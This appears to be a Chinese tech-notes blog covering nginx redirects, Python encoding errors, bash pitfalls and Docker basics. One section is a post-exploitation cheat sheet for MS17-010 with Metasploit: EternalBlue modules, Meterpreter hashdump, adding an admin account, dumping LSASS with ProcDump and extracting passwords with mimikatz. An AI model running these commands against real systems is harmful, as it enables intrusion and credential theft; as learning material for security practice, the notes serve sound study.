nginx端口重定向，主域名跳转www，配置

端口重定向 80 --> 9800
ss.abc.com   -->  ss.abc.com:9800

server
{
    listen 80;
    server_name ss.abc.com;
 
    location / {
    proxy_pass http://ss.abc.com:9800;
    proxy_set_header Host $host:80;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header Via "nginx";
    }
}


宝塔创建一个abc.com的站点，

一级域名跳转到www二级域名

1. #只是一级域名“abc.com” 跳转到www.abc.com去。

server {
           listen 80;
           server_name abc.com;

           if ($http_host ~ "^ilovegt.com$") {
                     rewrite ^(.*) http://www.ilovegt.com$1 permanent;
            }
}

针对MS17-010漏洞攻击之Metasploit

0x01 hash密码导出，并且破解方法

If LM hashes are enabled on your system (Win XP and lower), a hash dump will look like:

Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

If LM hashes are disabled on your system (Win Vista, 7, 8+), a hash dump will look like:

Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537:::

每个字段的含义：          用户名：唯一安全ID：LM_HASH ：NTLM_HASH

这串值就是LM_HASH，通过google “lm hash crack” 尝试破解

01FC5A6BE7BC6929AAD3B435B51404EE

0x02 Meterpreter 命令行工具

通过google搜索  “Metasploit工具Meterpreter的命令速查表”对反弹shell进行利用

其中比较常用的命令：

getuid                                        查看当前用户

getsystem                                  获取系统权限

shell                                           打开shell或者cmd

run hashdump                           把sam数据库dump

0x03 常用payload
 use windows/meterpreter/reverse_tcp
 use auxiliary/scanner/smb/pipe_auditor

ms17-010 payload：
       use exploit/windows/smb/ms17_010_eternalblue
       use exploit/windows/smb/ms17_010_psexec

0x04 ms17-010漏洞利用
     使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
     MSF下ms17_010_psexec模块使用技巧
     Meterpreter提权详解

0x05 windows修改用户密码技巧
因为中文的windwos系统，在Meterpreter 会显示乱码，在进行net user操作出现报错


比如 NET HELPMSG 2245  表示密码长度不够规格，不够复杂
比如 NET HELPMSG 3783  表示没有这个组或者用户
net user administrator abc123      //修改administrator的密码
net user test v5est0r /add                    //增加新用户
net localgroup administrators test /add       //并且加入管理员组

0x06 获取system权限，对管理员密码获取
利用Meterpreter upload 上传 ProcDump 对系统的LSASS进程内存文件导出，命令如下
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
导出后，利用Meterpreter download 将 lsass.dmp 文件下载到本地


最后运行mimikatz，进行破解
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Meterpreter 加载mimikatz直接进行破解

load mimikatz

help mimikatz

mimikatz_command -f privilege::debug
mimikatz_command -f privilege::security
mimikatz_command -f sekurlsa::logonPasswords

编码，乱码，如何透彻理解

编码。

在python里面，你定义一个字符串的时候，就已经通过编码器，对你输入的字符串进行编码，并且放入内存。

规则1：放入内存里面的字符串，一定经过编码

当使用print 对字符串变量进行打印，必须要对字符串进行解码才能显示。注意这里只是显示，要显示正确，必须用对应的字符集（gbk, gb2312, utf-8, ascii）。如果显示错误（仅是人类感知，计算机不知道情况），就是乱码。

规则2：控制台标准输出，浏览器显示区，notepad文字区等，都是需要进行解码后才可以显示的

举例：
在写自动发送邮件过程，包含多次编码解码动作

1. 生成html文件，在python3可以指定编码。
2. 读取的时候，在python2.7需要进行指定解码字符集，
3. 经过bottle模块，模板处理的时候也需要进行解码
4. smtp发送邮件，也需要进行编码
5. 最后foxmail客户端，就是我们的数据展示区，还需要对邮件内容进行解码

那么多个过程涉及编码，所以出现乱码，要冷静分析，看看数据处理的过程，分析出原因


要更深入了解乱码，首先你要能够随时制造编码错误

  
UnicodeDecodeError: 'utf8' codec can't decode byte 0xb5 in position 2: invalid start byte
UnicodeDecodeError: 'ascii' codec can't decode byte 0xb5 in position 2: ordinal not in range(128)

通过下面代码，制造错误
>>> a='as的'
>>> print a
as的
>>> print a.decode('utf-8')
>>> print a.decode('ascii')
>>> print a.decode('gbk')
>>> print a.decode('gb2312')
>>> print a.decode('cp936')
-

bash脚本的坑

    你会写python脚本，但是不会写shell脚本，其实只要注意几步，就可以像写python那样简单

0x01 bash脚本第一坑
变量赋值竟然不支持空格。

 
a = "my name" ✘ 这样是不能赋值成功的，并且提示“-bash: a: command not found”
a="name"      ✔

array[0] = "hello"  ✘
array[0]="hello"    ✔

0x02 变量调用需要加$

echo $a
array[0]=$a

0x03 bash脚本第二坑
数组会自动对字符串变量进行分割，这个特性很不好，特别对字符串处理的时候，
这个特性不应该作为自动分割，如果需要使用分割功能， 加上特别的参数，这样设计更合理

output="i am a boy"
这个变量赋值给array的时候会进行分割
array=($output)
最后，变成：
array[0]="i"
array[1]="am"
array[2]="a"
array[3]="boy"

要使"i am a boy"存入array后保持完整，可以用下面的方法：
array[0]=$output
array=([0]=$output)

0x04 jq调试工具

--raw-input/ -R：

不要将输入解析为JSON。相反，每行文本都作为字符串传递给过滤器。如果与之结合使用--slurp，则整个输入将作为单个长字符串传递给过滤器。

--raw-output/ -r： 解析后的字符串去引号

使用此选项，如果过滤器的结果是字符串，则它将直接写入标准输出，而不是格式化为带引号的JSON字符串。这对于使jq过滤器与非基于JSON的系统进行通信非常有用。

0x05 curl只输出json数据

这样会输出http头部信息
curl -i -H "Content-Type: application/json" -X POST http://127.0.0.1/api/add

只输出http body的json数据
curl -s -H "Content-Type: application/json" -X POST http://127.0.0.1/api/add


参考链接：
1. BASH 数组用法小结

数据脱敏_日志脱敏

日志脱敏

链接1 日志脱敏需求

链接2  日志脱敏需求

链接3 日志脱敏需求

链接4

数据脱敏

链接1

链接2 

安全练习靶场收集

phpcms系统
1. axublog

sql注入测试
2. sqli-labs
3. RedTiger's hackit

docker学习过程

0x00 背景
       最近要部署一套安全应急中心系统，需要使用docker进行部署安装，以前经常听过docker，也了解过，但是就是没用过，其实只是使用docker部署环境，其实没什么太大的难度，只要掌握基本的命令，就可以操作了。

0x01 我理解的docker
         容器有运行的概念。
              1.  run，创建容器运行命令
              2.  start/stop/restart ，容器创建后可以通过docker ps -a 查看已经创建的容器
                   docker start [容器id]，就可以启动容器
              3.  stats , 可以查看容器的运行状态，内存使用情况，cpu使用情况，磁盘网络IO
              4.  kill & rm，关闭docker / 删除容器

    进入容器的shell有两种方法：
    docker attach [容器ID]                 # 这是进入docker run时的交互shell
    docker exec -it [容器ID] bash      #  这是打开一个新的shell

    如果想直接在终端中查看启动命令的输出，用 attach；其他情况使用 exec。
    当然，如果只是为了查看启动命令的输出，可以使用 docker logs 命令：
    docker logs -f 的作用与 tail -f 类似，能够持续打印输出。

0x02 docker仓库配置
        各个版本的docker仓库配置不一样
        中国科学技术大学的开源镜像

        docker images  -- 查看本地已经下载的镜像

0x03 如何解决Docker容器和宿主机时间同步问题

把时区设置加入到Dockerfile中
# CentOS
   RUN echo "Asia/shanghai" > /etc/timezone;

# Ubuntu
   RUN cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime

0x04 查看容器的启动命令

在容器外部，物理机上，可以用docker inspect查看。
如果在容器内部。可以用 ps -fe 查看。其中1号进程就是启动命令。

查看共享文件的映射关系
docker inspect 1cb8e758f58e | grep -A10 HostConfig

        "HostConfig": {
            "Binds": [
                "/opt/xunfeng_8000:/data"

参考链接：
1. 用docker实现微服务的便捷运维